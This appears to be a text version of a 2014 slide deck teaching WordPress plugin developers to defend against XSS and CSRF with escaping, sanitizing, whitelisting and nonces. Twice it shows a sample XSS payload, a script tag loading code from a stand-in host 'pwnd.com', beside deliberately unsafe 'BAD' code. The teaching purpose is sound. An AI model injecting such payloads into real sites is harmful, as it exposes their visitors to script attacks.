So you’re writing code for the masses, huh? Are you being responsible and protecting them from getting pwned?
Sep 01, 2014
So you’re writing code for the masses, huh?Are you being responsible and protecting them from
getting pwned?
Watch This.http://wordpress.tv/2011/01/29/mark-jaquith-theme-plugin-security/
That guy pwned a plugin I wrote live on stage at
WordCamp New York.It changed my life.
Read This.http://wp.tutsplus.com/tutorials/creative-coding/data-sanitization-and-validation-with-wordpress/
tl;dr
• Keep your dev environment clean
• Escape your data output
• Sanitize your data inputs
• Validate referrers
• Core functionality should always trump your super awesome functionality
Keep Your Dev Environment Clean
Don’t think that just because you’re on a mac you’re safe from viruses.
If you’re on a PC, you should assume you’re already pwned.
Kaspersky Anti-Virus
• I use it.
• Dre uses it.
• Tony uses it.
• You should be using it.
Trust No One,Trust Nothing
XSS: Cross-site Scripting
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications. XSS enables attackers to inject client-side script into Web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy. Cross-site scripting carried out on websites accounted for roughly 84% of all security vulnerabilities documented by Symantec as of 2007.[1] Their effect may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site and the nature of any security mitigation implemented by the site's owner.
http://en.wikipedia.org/wiki/Cross-site_scripting
Escape All The Things On Outputhttp://codex.wordpress.org/Data_Validation#Output_Sanitation
• Bad data will be tamed
• esc_{context}
• esc_js - Escape single quotes, htmlspecialchar " < > &, and fix line endings.
• esc_html - Escaping for HTML blocks.
• esc_attr - Escaping for HTML attributes.
• esc_sql - Escapes data for use in a MySQL query.
• esc_url - Checks and cleans a URL.
• esc_textarea - Escaping for textarea values.
Sanitize All The Things On Inputhttp://codex.wordpress.org/Data_Validation#Input_Validation
• sanitize_* and similar functions help for most things
• $_POST = array(‘e’=>‘<script src=‘http://pwnd.com/u.js’></script>’)
• BAD: update_post_meta($id, ‘e’, $_POST[‘e’])
• GOOD: update_post_meta($id, ‘e’, sanitize_email($_POST[‘e’]))
• Note: Might unintentionally change data and give unexpected results
Whitelisting Datahttp://codex.wordpress.org/Data_Validation#Whitelist
• Whitelisting data - Only accept known data
• $_POST = array(‘pwn’=>‘<script src=‘http://pwnd.com/u.js’></script>’,‘e’=‘[email protected]’);
• BAD:
• foreach( $_POST as $key => $val ) :update_post_meta($id, $key, $val);endforeach;
• GOOD: update_post_meta($id, ‘e’, sanitize_email($_POST[‘e’]))
Blacklisting Datahttp://codex.wordpress.org/Data_Validation#Blacklist
• Blacklisting data - Only accept data if it’s in the proper format
• $_POST = array(‘e’=‘me@domain.’);
• if( is_email($_POST[‘e’]) )update_post_meta( $id, ‘e’, sanitize_email($_POST[‘e’]) );
CSRF: Cross-site Request Forgery
Cross-site request forgery, also known as a one-click attack or session riding and abbreviated as CSRF (sometimes pronounced sea-surf[1]) or XSRF, is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts.[2] Unlike cross-site scripting (XSS), which exploits the trust a user has for a particular site, CSRF exploits the trust that a site has in a user's browser.
http://en.wikipedia.org/wiki/Cross-site_request_forgery
Sweet, this might lead to my next big deal! ACCEPT!
zOMG WTF?!
http://mysite.com/wp-admin/post.php?post=307&action=trash
Nonces FTW!(http://codex.wordpress.org/WordPress_Nonces)
• Before the Request
• wp_nonce_url
• wp_create_nonce
• wp_nonce_field
• Verify the Request
• wp_verify_nonce
• check_admin_referer
Is there an API for that?
Professional WordPressPlugin Developmenthttp://amzn.to/plugindevbook